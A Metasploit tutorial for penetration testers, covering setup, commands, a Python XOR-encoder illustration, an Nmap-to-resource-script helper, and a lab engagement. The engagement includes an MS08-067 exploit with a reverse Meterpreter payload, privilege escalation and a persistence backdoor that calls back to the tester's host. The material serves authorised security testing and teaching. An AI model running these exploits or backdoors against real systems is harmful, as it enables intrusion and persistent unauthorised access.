Metasploit Tutorial

Comprehensive Metasploit Tutorial

Introduction

Metasploit is a powerful and widely used penetration testing framework that gives security researchers and professionals the tools to test systems for known vulnerabilities, develop and run exploit code, and carry out the surrounding tasks of an engagement: scanning, post-exploitation, evidence collection. This guide walks through the basics of Metasploit, its installation, day-to-day usage, and a few advanced features.

Prerequisites

  • A system with Kali Linux installed (Metasploit comes pre-installed on Kali Linux).
  • Basic understanding of network protocols, operating systems, and cybersecurity concepts.
  • A target machine for testing purposes (e.g., a vulnerable virtual machine like Metasploitable).

Installing Metasploit

Metasploit is pre-installed on Kali Linux, where it is maintained as an ordinary package. On other Linux distributions, Rapid7's nightly installer sets up the framework together with its own Ruby and PostgreSQL. The msfupdate script in the metasploit-framework repository only updates an existing installation; piping it into sudo bash, as some older tutorials suggest, does not install anything.

  1. Update and Upgrade Your System:
    sudo apt-get update && sudo apt-get upgrade
  2. Install or Update Metasploit on Kali:
    sudo apt-get install metasploit-framework
  3. Install Metasploit Framework on another distribution with Rapid7's installer script:
    curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
    chmod 755 msfinstall
    ./msfinstall

    Download the installer to disk and read it before running it rather than piping curl straight into a root shell; a tampered download would otherwise execute as root unseen. Once installed, running msfupdate pulls the latest framework release.

Starting Metasploit

  1. Initialise the database once, then start Metasploit. Root is not needed for msfconsole itself, only for things such as SYN scans or listening on ports below 1024; the database is what makes workspaces and the db_ commands work:
    sudo msfdb init
    msfconsole
  2. Metasploit Console:

    Upon starting, you will see the Metasploit banner and the msf6 > prompt (msf5 > or msf > in older versions), indicating that Metasploit is ready for use. db_status confirms that the console is connected to its PostgreSQL database.

Basic Commands

  • Search: Find exploits, payloads, or auxiliary modules. Plain words are matched against names and descriptions; keywords such as type:exploit, platform:windows or cve:2017 narrow the result list.
    search <term>
  • Use: Load a specific module.
    use <module_path>
  • Show Options: Display the options for the loaded module, with their defaults and whether they are required. show payloads lists the payloads compatible with the module.
    show options
  • Set: Set an option for the module. setg sets it globally, so every module used afterwards in the session inherits it (useful for LHOST and RHOSTS).
    set <option_name> <value>
  • Check: Where the module implements it, test whether the target appears vulnerable without running the exploit.
    check
  • Run/Exploit: Execute the loaded module. exploit -j runs it as a background job, which is how a handler is normally kept waiting for callbacks.
    run
    or
    exploit
  • Sessions: List the sessions opened by successful exploits and attach to one; background inside a session returns to the console without closing it.
    sessions -l
    sessions -i <session_id>

Metasploit Modules

Metasploit consists of several types of modules:

Exploits

Code that takes advantage of a vulnerability in a system.

use exploit/<module_path>

Payloads

Code that runs on the target system after exploitation. A payload name encodes the platform, the payload itself and the connection direction: windows/meterpreter/reverse_tcp is a staged Meterpreter that connects back from the target to LHOST:LPORT, while a bind_tcp payload listens on the target instead. Reverse payloads are the usual choice because the target's outbound connection is more likely to pass a firewall than an inbound one.

set payload <payload_name>

Auxiliary

Modules used for scanning, fuzzing, and other tasks that don't require exploitation.

use auxiliary/<module_path>

Encoders

Transform a payload so that it contains none of the bytes the target cannot accept (bad characters such as a null byte in a string copy, or a newline in a line-based parser) while still decoding to the same code at run time. Evading antivirus is not what they are good at: the output of common encoders such as x86/shikata_ga_nai is well known to detection engines. In msfconsole an encoder is loaded by its path; msfvenom applies one with -e and takes the bad characters to avoid with -b.

use encoder/<encoder_name>
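What an encoder actually solves is easier to see in a small model than in the framework's Ruby. The following is an added example written for this tutorial, not code from Metasploit: a single-byte XOR encoder in the spirit of x86/xor, where the decode() function stands in for the machine-code decoder stub that a real encoder prepends. The bad-character set and the stand-in "shellcode" bytes are constructed for the example.

```python
# Added example (not Metasploit code): a single-byte XOR encoder in the
# spirit of x86/xor. A real encoder emits a decoder stub in machine code;
# here decode() plays that role. The key is embedded in the stub, so the
# key itself must also be free of bad characters.

# Typical bad bytes for a string-copy overflow: NUL, LF, CR (constructed set).
BAD_CHARS = b"\x00\x0a\x0d"

# Constructed stand-in for shellcode, with an embedded NUL and LF that a
# strcpy()-style copy would truncate on.
PAYLOAD = bytes([0x31, 0xC0, 0x50, 0x68, 0x00, 0x0A, 0x2F, 0x73,
                 0x68, 0x68, 0x2F, 0x62, 0x69, 0x6E, 0x89, 0xE3])


def has_bad_chars(data: bytes, bad: bytes = BAD_CHARS) -> bool:
    """True if any byte of data is in the bad-character set."""
    return any(b in bad for b in data)


def find_xor_key(payload: bytes, bad: bytes = BAD_CHARS):
    """Return the first single-byte key that makes payload ^ key free of bad
    characters, or None if no such key exists. Key 0 is skipped because it
    would leave the payload unchanged."""
    for key in range(1, 256):
        if key in bad:
            continue  # the key lives in the decoder stub, so it must be clean too
        if not has_bad_chars(encode(payload, key), bad):
            return key
    return None


def encode(payload: bytes, key: int) -> bytes:
    """XOR every payload byte with the key (what the encoder does offline)."""
    return bytes(b ^ key for b in payload)


def decode(encoded: bytes, key: int) -> bytes:
    """XOR back (what the decoder stub does on the target at run time)."""
    return bytes(b ^ key for b in encoded)


if __name__ == "__main__":
    key = find_xor_key(PAYLOAD)
    if key is None:
        print("no single-byte key avoids the bad characters; "
              "a multi-byte or polymorphic encoder would be needed")
    else:
        enc = encode(PAYLOAD, key)
        print(f"key=0x{key:02x} encoded={enc.hex()} "
              f"clean={not has_bad_chars(enc)} decodes_ok={decode(enc, key) == PAYLOAD}")
```

The None branch is the case that drives people to iterated or polymorphic encoders (the -i count in msfvenom): with a large enough bad-character set, no single key keeps every encoded byte and the key itself clean, and a richer decoder is the only way out.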

Nops

No-operation instructions used to pad payloads, typically to build a NOP sled in front of shellcode so that an imprecise return address still lands on executable code.

use nop/<nop_name>

Post

Modules that run against an already open session rather than a remote host: enumeration, credential harvesting, local exploit suggestion, and persistence. They take a SESSION option instead of RHOSTS.

use post/<module_path>
set SESSION <session_id>
run

Conducting a Penetration Test with Metasploit

Step 1: Information Gathering

Use Nmap and Metasploit's auxiliary modules to gather information about the target. Running the scans from inside msfconsole records hosts and services in the database, so later modules and the hosts and services commands can work from the same data.

Port Scanning with Nmap

nmap -sS -A <target_ip>

-sS (SYN scan) requires root, and -A adds OS detection, version detection and default scripts, which is thorough but noisy. Run the same scan as db_nmap inside msfconsole and the results are saved into the current workspace:

db_nmap -sS -sV <target_ip>
hosts
services

Service Enumeration

use auxiliary/scanner/portscan/tcp
set RHOSTS <target_ip>
set THREADS 10
run

Step 2: Vulnerability Scanning

Identify vulnerabilities on the target system. Metasploit does not ship a Nikto module; Nikto is a separate tool whose findings are recorded by hand. What the framework provides is version scanners and a number of dedicated vulnerability checks under auxiliary/scanner/, plus the check command of exploit modules that implement one.

Using Vulnerability Scanners

use auxiliary/scanner/smb/smb_version
set RHOSTS <target_ip>
run

use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS <target_ip>
run

Modules such as smb_ms17_010 record what they find in the database; the vulns command lists it. For a web target, auxiliary/scanner/http/http_version and auxiliary/scanner/http/dir_scanner give a first picture of the server, but a dedicated web scanner is still needed for a thorough web assessment.
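Typing one scanner per service by hand does not scale past a couple of hosts. The script below is an added example written for this tutorial, not part of Metasploit or Nmap: it reads the XML that nmap -sV -oX writes, maps every open service to the Metasploit version and vulnerability scanners worth running first, and emits a resource script that msfconsole -r replays. The module paths are real framework modules; the service-to-module table and the sample scan are constructed for the example, and the helper names (open_services, build_rc, write_and_run) are the example's own.

```python
"""Turn an Nmap XML scan into a msfconsole resource script.

Added example for this tutorial, not part of Metasploit or Nmap. Input is the
XML produced by `nmap -sV -oX scan.xml <target>`; output is a resource script
that runs the matching auxiliary scanners per open service, replayable with
`msfconsole -q -r enum.rc`. Module paths are real; the mapping table and the
sample scan below are constructed for the example.
"""
import shutil
import subprocess
import sys
import xml.etree.ElementTree as ET

# Nmap service name -> auxiliary modules to run against it (constructed mapping).
SERVICE_MODULES = {
    "ftp": ["auxiliary/scanner/ftp/ftp_version", "auxiliary/scanner/ftp/anonymous"],
    "ssh": ["auxiliary/scanner/ssh/ssh_version"],
    "telnet": ["auxiliary/scanner/telnet/telnet_version"],
    "http": ["auxiliary/scanner/http/http_version"],
    "netbios-ssn": ["auxiliary/scanner/smb/smb_version"],
    "microsoft-ds": ["auxiliary/scanner/smb/smb_version", "auxiliary/scanner/smb/smb_ms17_010"],
    "mysql": ["auxiliary/scanner/mysql/mysql_version"],
}

# Constructed sample in Nmap's XML layout: one host up with open and filtered
# ports, one host down.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 192.168.56.0/24">
  <host>
    <status state="up"/>
    <address addr="192.168.56.101" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/><service name="ftp" product="vsftpd" version="2.3.4"/></port>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="Apache httpd"/></port>
      <port protocol="tcp" portid="139"><state state="filtered"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    </ports>
  </host>
  <host>
    <status state="down"/>
    <address addr="192.168.56.102" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def open_services(xml_text):
    """Return (ip, port, service_name) for each open TCP port of every host that is up."""
    found = []
    for host in ET.fromstring(xml_text).iter("host"):
        status = host.find("status")
        addr = host.find("address[@addrtype='ipv4']")
        if status is None or status.get("state") != "up" or addr is None:
            continue
        for port in host.iter("port"):
            state = port.find("state")
            if port.get("protocol") != "tcp" or state is None or state.get("state") != "open":
                continue
            service = port.find("service")
            name = service.get("name", "unknown") if service is not None else "unknown"
            found.append((addr.get("addr"), int(port.get("portid")), name))
    return found


def build_rc(services, workspace="lab"):
    """Resource-script text: one module run per (host, port) with a matching scanner.
    RPORT is set explicitly so a service on a non-default port is still reached."""
    lines = [f"workspace -a {workspace}", "setg THREADS 10"]
    for ip, port, name in services:
        for module in SERVICE_MODULES.get(name, []):
            lines += [f"use {module}", f"set RHOSTS {ip}", f"set RPORT {port}", "run"]
    lines += ["services", "vulns"]  # show what the database holds after the run
    return "\n".join(lines) + "\n"


def write_and_run(rc_text, path="enum.rc"):
    """Write the script and replay it in msfconsole when it is installed; return whether it ran."""
    with open(path, "w") as f:
        f.write(rc_text)
    if shutil.which("msfconsole") is None:
        return False
    subprocess.run(["msfconsole", "-q", "-r", path], check=False)
    return True


if __name__ == "__main__":
    xml_text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XML
    rc = build_rc(open_services(xml_text))
    print(rc, end="")
    write_and_run(rc)
```

Run it as python3 nmap2rc.py scan.xml against a real scan; without an argument it uses the constructed sample and prints the script it would replay. Filtered ports and hosts that are down produce nothing, which is deliberate: a scanner fired at a closed port only adds noise to the database.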

Step 3: Exploitation

Use exploits to gain access to the target system. Match the exploit to the service version and operating system found during enumeration; an exploit run against the wrong version can crash the service instead of opening a session.

Search for Exploits

search type:exploit platform:windows smb

Select and Configure an Exploit

use exploit/windows/smb/ms08_067_netapi
set RHOSTS <target_ip>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <your_ip>
set LPORT 4444
check
run

The target option is RHOSTS (RHOST still works as an older alias). LHOST must be an address the target can reach, because a reverse_tcp payload connects from the target back to your listener on LHOST:LPORT. check asks the module to test for the vulnerability without exploiting it, and show targets lists the OS versions the module supports (the default is usually automatic targeting). MS08-067 affects unpatched Windows 2000, XP and Server 2003 and is shown here as the classic lab example.

Step 4: Post-Exploitation

Perform tasks after gaining access to the target system.

Meterpreter Session

Upon successful exploitation, Metasploit will provide a Meterpreter session.

meterpreter>

Gather Information

Collect information from the target system.

meterpreter> sysinfo
meterpreter> getuid
meterpreter> ipconfig

File System Navigation

Browse the target file system.

meterpreter> ls
meterpreter> cd <directory>
meterpreter> download <file>

Privilege Escalation

Attempt to elevate privileges on the target system. getsystem tries a few built-in techniques (named-pipe impersonation and token duplication) that work when the session already runs with administrative rights or holds SeImpersonatePrivilege; from an ordinary user session it usually fails. The next step is then to let Metasploit suggest local exploits that match the host's patch level, and getuid confirms whether escalation worked.

meterpreter> getsystem
meterpreter> getuid
meterpreter> run post/multi/recon/local_exploit_suggester

Maintaining Access

Establish a persistent backdoor on the target system only when the rules of engagement allow it, record exactly what was installed, and remove it at the end of the test. The persistence Meterpreter script found in older tutorials (run persistence -U -i 5 ...) has been removed from current versions of the framework; the current way is a local exploit module run against the session, which installs a payload that calls back to a handler you keep running with exploit/multi/handler. The module prints the path of a cleanup resource script; keep it for the teardown.

meterpreter> background
use exploit/windows/local/persistence
set SESSION <session_id>
set STARTUP USER
set DELAY 5
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <your_ip>
set LPORT 4444
run

Step 5: Reporting

Document your findings and create a report. The framework keeps the evidence of the engagement in its database; the commercial Metasploit Pro edition adds generated reports on top of that.

Export Data from the Framework

hosts
services
vulns
creds
loot
db_export -f xml <report>.xml

Manual Documentation

Note down each vulnerability with the host and port, the module and payload used, the level of access obtained and the evidence (loot, screenshots), together with the remediation. List every change made to a target (accounts, files, persistence) so that cleanup can be verified.

Advanced Features

Armitage

Armitage is a graphical front-end for Metasploit that shows discovered hosts and the exploits matching them visually and lets a team share one Metasploit instance. It has not been actively developed for years and may no longer be in your distribution's repositories, so check with apt-cache policy armitage before relying on it.

Install Armitage

sudo apt-get install armitage

Start Armitage

Armitage needs the database and Metasploit's RPC service: start the database first, then launch Armitage and accept its offer to start msfrpcd.

sudo msfdb start
sudo armitage

Using Armitage

Provides a visual representation of targets and the exploits available for them, driving the same framework modules described above.

Metasploit Community and Pro

Metasploit Pro, the commercial edition, adds automated exploitation, vulnerability validation, advanced reporting, and team collaboration tools on top of the open-source framework. The free Metasploit Community edition was discontinued by Rapid7 in 2019. Visit Rapid7's website for more information.

Conclusion

Metasploit is a versatile and powerful tool for penetration testers, security researchers, and ethical hackers. By understanding its modules, commands, and features, you can conduct thorough penetration tests and improve the security posture of the systems you are engaged to test. Always ensure you have written authorization before performing any penetration testing activities.

